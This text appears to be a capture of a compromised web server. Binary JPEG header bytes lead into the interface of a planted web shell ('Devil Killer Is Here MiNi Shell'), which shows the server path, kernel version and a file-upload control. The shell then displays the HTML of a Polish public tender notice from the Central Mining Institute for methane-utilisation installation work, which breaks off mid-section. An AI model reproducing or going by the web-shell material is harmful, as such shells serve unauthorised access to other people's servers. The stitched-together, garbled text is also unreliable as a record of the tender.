JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240619/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240619/0037447001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa wykonania i montażu elementów łączących dyfuzor szybu wentylacyjnego z instalacją utylizacji metanu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Główny Instytut Górnictwa - Państwowy Instytut Badawczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000023461</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Gwarków 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-166</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mwallenburg@gig.eu; phachula@gig.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gig.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Instytut Badawczy </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa wykonania i montażu elementów łączących dyfuzor szybu wentylacyjnego z instalacją utylizacji metanu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-02eaa4b7-27c4-11ef-87ba-8eb060fd7bb8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00374470</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> ProVAM: Reduction of Ventilation Air Methane Emissions in the Coal Mining Transformation Process (Redukcja metanu z powietrza wentylacyjnego w procesie transformacji górnictwa węgla kamiennego) Grant Agreement no. Project 101112618 — ProVAM, współfinansowanego z Funduszu Badawczego Węgla i Stali (RFCS) </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-02eaa4b7-27c4-11ef-87ba-8eb060fd7bb8 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-02eaa4b7-27c4-11ef-87ba-8eb060fd7bb8</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu komunikacja między Zamawiającym a Wykonawcą odbywa się przy użyciu poczty elektronicznej mwallenburg@gig.eu lub phachula@gig.eu lub Platformy e-Zamówienia, dostępnej pod adresem https://ezamowienia.gov.pl. Wszystkie wysłane i odebrane przez Wykonawcę<br/>wiadomości widoczne będą po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>2. Postępowanie można wyszukać ze strony głównej Platformy e-Zamówienia poprzez kafelek „Przeglądaj postępowania / konkursy”.<br/>3. Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać aktywne konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Wykonawca posiadający aktywne konto na Platformie e-Zamówienia będzie miał dostęp do formularzy służących do komunikacji z Zamawiającym oraz do formularzy umożliwiających złożenie lub wycofanie oferty. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>UWAGA – Wykonawca powinien dokładnie zapoznać się z instrukcją zakładania konta użytkownika, dostępną na Platformie e-Zamówienia, kafelek „Centrum Pomocy”.<br/>4. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów / oświadczeń / informacji zostały opisane w regulaminach korzystania z Platformy e-Zamówienia, dostępnych pod adresem ttps://ezamowienia.gov.pl w zakładce „Centrum Pomocy”.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy e-Zamówienia wynosi 150 Mb. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z Platformy e-Zamówienia oraz wymagania dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>6. Za datę przekazania oferty przyjmuje się datę jej przekazania na Platformę e-Zamówienia, a za datę przekazania dokumentów elektronicznych, cyfrowych odwzorowań dokumentów oraz innych informacji przyjmuje się datę ich przekazania na Platformę e-Zamówienia, a w przypadku przekazywania tych dokumentów oraz informacji za pomocą poczty elektronicznej – datę potwierdzenia dostarczenia wiadomości zawierającej dokument / informację z serwera pocztowego Zamawiającego.<br/>7. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy powinni posługiwać się numerem postępowania nadanym przez Zamawiającego, tj. FZ/6002/PH/24.<br/>8. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020r. (Dz.U. z 2020r., poz.2452).<br/>9. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych jest Główny Instytut Górnictwa Państwowy Instytut Badawczy z siedzibą przy Pl. Gwarków 1 w Katowicach, 40-166, tel.: 32 259 20 00, fax: 32 259 65 33.<br/>2. Inspektor Ochrony Danych dostępny jest pod adresem: gdpr@gig.eu.<br/>3. Dane osobowe są przetwarzane w celu przeprowadzenia postępowania o udzielenie zamówienia publicznego na podstawie art. 6 ust.1 lit. c RODO - w celu przeprowadzenia postępowania o udzielenie zamówienia publicznego – podstawą prawną ich przetwarzania jest ciążący na Administratorze obowiązek prawny stosowania sformalizowanych procedur udzielania zamówień publicznych.<br/>4. W razie zawarcia wskutek przeprowadzonej przez Administratora procedury o udzielenie zamówienia publicznego umowy dane osobowe przetwarzane są w celu zawarcia i realizacji tej umowy na podstawie:<br/>a) art. 6 ust. 1 lit. b) RODO – przetwarzanie jest niezbędne do zawarcia i realizacji umowy lub czynności poprzedzających jej realizację;<br/>b) art. 6 ust. 1 lit. c) RODO – przetwarzanie jest niezbędne do wykonania obowiązków ciążących na Administratorze, wynikających z przepisów prawa, w tym przepisów prawa zamówień publicznych i prawa podatkowego;<br/>c) art. 6 ust. 1 lit. f) RODO – przetwarzanie jest niezbędne dla realizacji prawnie uzasadnionych interesów Administratora, w tym dochodzenia lub odpierania ewentualnych roszczeń.<br/>5. Przysługuje Pani/Panu prawo do:<br/>a) dostępu do treści danych osobowych oraz ich sprostowania, przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Prawo zamówień publicznych oraz nie może naruszać integralności protokołu oraz jego załączników;<br/>b) ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art.18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia;<br/>c) wniesienia sprzeciwu, zażądania zaprzestania przetwarzania i przenoszenia danych – w zakresie określonym w przepisach RODO;<br/>d) wniesienia skargi do organu nadzorczego jakim jest Prezes Urzędu Ochrony Danych Osobowych gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>6. Podanie danych osobowych jest dobrowolne, lecz niezbędne do realizacji celów, w jakich dane są przetwarzane. W przypadku niepodania danych osobowych udział w postępowaniu o udzielenie zamówienia publicznego oraz zawarcie i realizacja umowy nie będzie możliwe. Niezbędność podania przez Panią/Pana danych osobowych w związku z udziałem w postępowaniu o udzielenie zamówienia publicznego jest wymogiem ustawowym, określonym w przepisach ustawy Prawo zamówień publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7. Udostępnione przez Panią/Pana dane osobowe mogą być udostępnione innym podmiotom w celu wykonania na zlecenie Administratora czynności związanych z realizacją celów przetwarzania. Odbiorcami danych mogą być również instytucje upoważnione z mocy prawa, w tym podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art.18 oraz<br/>art.74 ustawy Prawo zamówień publicznych.<br/>8. Udostępnione przez Panią/Pana dane nie będą podlegały udostępnieniu do państwa trzeciego lub do organizacji międzynarodowej.<br/>9. Udostępnione przez Panią/Pana dane osobowe nie będą przetwarzane w sposób automatyzowany oraz w formie profilowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">FZ/6002/PH/24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Zakres prac obejmuje dwa etapy zadań:<br/>ETAP 1<br/>a.	Wykonanie połączenia instalacji do utylizacji metanu z dyfuzorem szybu wentylacyjnego KD Barbara wraz z zabudową zaworu odcinającego na trasie tego połączenia. Wykonanie konstrukcji nośnej dla ww. elementów łączeniowych<br/>-	średnica rurociągu (lutniociągu) przyłączeniowego DN 500 mm,<br/>-	podciśnienie w układzie -2,5 kPa,<br/>-	długość rurociągu około 40 metrów, trasa prowadzona na wysokości ok. 0,5m nad powierzchnią terenu oraz częściowo na ścianie budynku o wysokości 5m,<br/>-	rurociąg zakończony kompensatorem (przewód odciągowy poliuretanowy ze spiralą uziemioną do rurociągu). Długość około 500 mm.<br/>Rurociąg DN500 powinien być wyposażony w przepustnicę odcinającą DN500 ( alternatywnie DN300 - przed przepustnicą i za przepustnicą w redukcje DN500/DN300) wraz z siłownikiem pneumatycznym typu NC (zamknięty w przypadku braku zasilania) oraz elektrozawór typu NAMUR lub równoważny (w rurociągu w trakcie normalnej pracy maksymalne stężenie CH4 nie może przekraczać 1 % objętościowego).<br/>Rurociąg DN500 powinien być wyposażony w obejmy montażowe rozmieszczone w odległości co 4 m i prowadzony po bloczkach typu trylinka oraz na istniejącej konstrukcji nośnej na budynku. <br/>Rurociąg do szybu wprowadzony jest przez otwór dyfuzora kolanami 2 x 90 stopni a następnie dyfuzorem stalowym z blachy o grubości 1 mm. <br/>Montaż w rurociągu powietrza króćców do podłączenia pobieraków do analizy chromatograficznej. Króćce zakończone nyplem z zaworem ½”.<br/><br/>b.	Wykonanie projektu instalacji elektrycznej zasilającej urządzenie do utylizacji metanu (3x400V, 220A, 50Hz oraz 1x230V) oraz jego realizacja.<br/>Projekt powinien zawierać dobór kabli zasilających wraz z zabezpieczeniami i wyznaczeniem tras kabli na obiekcie.<br/>-	długość przyłącza (trasy kablowej około 55 m),<br/>- pierwsze główne zasilanie 3 fazowe 400V i 220A sieć TN-C,<br/>-	drugie zasilanie 1 fazowe 230V i 10A.<br/><br/>c.	Wykonanie instalacji monitoringu parametrów pracy i automatyki zabezpieczeniowej instalacji do utylizacji metanu wraz z połączeniem i uruchomieniem współpracy tych systemów z istniejącym w kopalni systemem gazometrii automatycznej. W zakres wchodzi podłączenie sygnałów pomiarowych o parametrach prądowych od 4 do 20 mA oraz montaż :<br/>-	Przepływomierza – 0 do 20 m/s, czujnika temperatury 50 do 100 oC, montaż w rurociągu poziomym. Prowadzenie przewodów do szafy AKPiA o długości ok 20 mb.<br/><br/>-	Czujnika stężenia metanu 0 – 5 % CH4 – montaż w rurociągu za pomocą rurki giętkiej doprowadzonej do głowicy. Prowadzenie przewodów do szafy AKPiA o długość ok 20 mb.<br/>-	Sygnału z krańcówek otwarcia / zamknięcia przepustnicy odcinającej oraz sygnału zasilającego cewki elektrozaworu. Prowadzenie przewodów do szafy AKPiA długość około 40 mb.<br/>-	Sygnału blokady i uprawnienia do załączenia instalacji (bezpotencjałowy)<br/>-	Połączenia VPN<br/><br/>d.	Wykonanie instalacji sprężonego powietrza wraz z dostawą sprężarki i dodatkowego zbiornika o parametrach: <br/> - kompresor bezolejowy o wydajności nie mniejszej, niż 15 m3n/h, ciśnieniu nie mniej niż 8 <br/> bar(g) z osuszaczem adsorpcyjnym o punkcie rosy powietrza na wylocie wyższym niż -40oC<br/> - zbiornik buforowy powietrza sprężonego o objętości 200 l, wyposażony w zawór bezpieczeństwa dobrany do ciśnienia roboczego kompresora oraz w manometr o zakresie pomiarowym do 10 bar(g).<br/> - rurociąg stalowy, ocynkowany, średnica rurociągu od sprężarki do zbiornika powietrza ½”.<br/>-	zbiornik powietrza sprężonego wyposażony w komplet niezbędnej armatury,<br/>-	ze zbiornika wyprowadzenie do kolektora rurą stalową, ocynkowaną ½”.<br/>Kolektor wyposażony w trzy zawory ½”:<br/>a)	do jednego z zaworów wkręcony filtroreduktor z manometrem o zakresie nie mniejszym niż 10 bar. Za filtroreduktorem zawór kulowy, odcinający ½” i zwiększenie średnicy rurociągu do 1”,<br/>b)	do drugiego z zaworów wkręcone złącze wtykowe na węża o średnicy 8 mm.<br/>c)	trzeci zawór z gwintem Gw1/2”<br/><br/>Sprężone powietrze musi być zawsze suche i wolne od środków smarnych. Przed dopuszczeniem sprężonego powietrza do systemu, rury muszą być przedmuchane w celu usunięcia zanieczyszczeń i przetestowane pod kątem nieszczelności.<br/><br/>e.	Wykonanie układu odprowadzania spalin (układu kominowego wraz z izolacją termiczną. Izolacja do wysokości 2,2 m od poziomu obsługi) odprowadzanych z instalacji do utylizacji metanu. Wykonanie ze stali węglowej s255GH lub równoważnej. Komin zabezpieczony antykorozyjnie w dolnej części w środku w klasie C5 na wysokości do 1 m. Powierzchnia pokrycia do 2 m2. Komin wyposażony w odprowadzenie wody.<br/> Wykonanie podłączenia komina z instalacją do utylizacji metanu za pomocą kompensatora wysokotemperaturowego giętkiego T max=500 oC DN600 z kołnierzami DN630 DIN24154 rząd 4 L=1000 mm.<br/><br/>f.	Rozładunek i ustawienie na płycie fundamentowej urządzenia (instalacji) o masie około 23 Mg. i osprzętu o masie do 2 Mg. wraz z instalacją pod nadzorem dostawcy.<br/>Zapewnienie odpowiedniego czasu pracy dźwigu do wykonania ww. prac oraz minimum 2 pracowników obsługi technicznej.<br/>Uwaga: Urządzenie będzie dostarczone przez firmę trzecią niezależną od Zamawiającego. <br/>Po wykonaniu punktów 1. a, b, c, d, e oraz dostawie urządzenia będzie dokonany montaż (połączenie) tych elementów z urządzeniem do utylizacji metanu.<br/>Wykonawca musi stawić się i dokonać montażu instalacji na pierwsze wezwanie Zamawiającego. Przewidywany czas trwania montażu 2-3 dni.<br/>ETAP 2<br/>Załadunek na samochód urządzenia (instalacji) i osprzętu po zakończeniu badań.<br/>Zamawiający przewiduje wykorzystanie 2 osób do załadunku.<br/>W ramach tego punktu należy również przeprowadzić demontaż rurociągu DN 500 na dyfuzorze szybu wentylacyjnego (w ramach tych prac Zamawiający wymaga użycia przez Wykonawcę dźwigu.) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">51500000-7 - Usługi instalowania maszyn i urządzeń</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">42123610-6 - Układy sprężonego powietrza</p> <p class="mb-0">45262610-0 - Kominy przemysłowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena brutto (z podatkiem VAT) za realizację przedmiotu zamówienia, na którą powinny składać się wszelkie koszty ponoszone przez Wykonawcę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Wg kolejności </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie o niepodleganiu wykluczeniu z postępowania (załącznik nr 2 do SWZ), składa każdy z Wykonawców.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, składają w formularzu ofertowym (załącznik nr 1 do SWZ) oświadczenie, z którego wynika, które dostawy wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>5. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy (podwykonawcom).<br/>6. Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia.<br/>7. Zamawiający wymaga, aby w przypadku powierzenia części zamówienia podwykonawcom, Wykonawca wskazał w ofercie (załącznik nr 1 do SWZ) części zamówienia, których wykonanie zamierza powierzyć podwykonawcom oraz podał (o ile są mu wiadome na tym etapie) nazwy (firmy) tych podwykonawców.<br/>8. Powierzenie wykonania części zamówienia podwykonawcy nie zwalnia wykonawcy z odpowiedzialności za należyte wykonanie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: 